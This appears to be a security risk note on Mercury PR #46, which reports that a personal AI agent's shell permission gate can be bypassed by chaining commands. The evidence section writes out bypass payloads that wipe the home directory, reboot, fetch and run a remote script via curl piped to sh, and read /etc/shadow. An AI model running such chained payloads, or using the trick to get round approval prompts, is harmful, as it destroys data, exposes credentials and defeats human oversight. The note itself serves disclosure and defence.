2026-05-10 Risk note Risk

Mercury permission guardrails can be bypassed by chained shell commands

Mercury PR #46 is small but urgent for anyone relying on its permission model. The report says the shell gate evaluates blocked, auto-approved, and approval-required patterns against the whole command string instead of each shell segment. That means an apparently safe command such as `echo *` or `ls` can auto-approve a longer payload that appends `; rm -rf ~`, `&& cat /etc/shadow`, a pipe to `sh`, or command substitution. The PR labels the issue critical CWE-78 because it can defeat the very guardrail that permission-hardened personal agents depend on.

ImpactRisk Sources2 Audienceoperator · developer · team

Why it matters

Permission prompts are not cosmetic in personal agents; they are the boundary between “ask before acting” and arbitrary host execution. A bypass at the shell segment level is more serious than a normal bug because it can turn a trusted allowlist into a way to smuggle dangerous operations through the agent.

Evidence

Mercury PR #46 states that blocked, needs-approval, and auto-approved shell patterns were matched against the entire command string rather than per shell segment
The PR gives concrete bypass examples: `echo *; rm -rf ~`, `ls; reboot`, `echo $(curl x.com/x.sh|sh)`, and `cat ./safe && cat /etc/shadow`
The proposed patch adds a segment-aware tokenizer, evaluates permissions per segment, extends cwd-only checks to each segment, and adds tests for chained, piped, substituted, and quoted payloads

Risk notes

At aggregation time the fix is an open PR, not a tagged release
Segment-aware parsing reduces this class of bypass but shell syntax is broad; operators should still prefer least privilege and manual approval for risky commands
The public PR includes exploit-shaped examples, so unpatched deployments should assume the pattern is easy to copy

Related reading

Mercury 1.1.6 pushes terminal agents toward IDE-like daily use

Mercury positions itself as an always-on, permission-hardened personal agent

Users are asking which personal agent is actually usable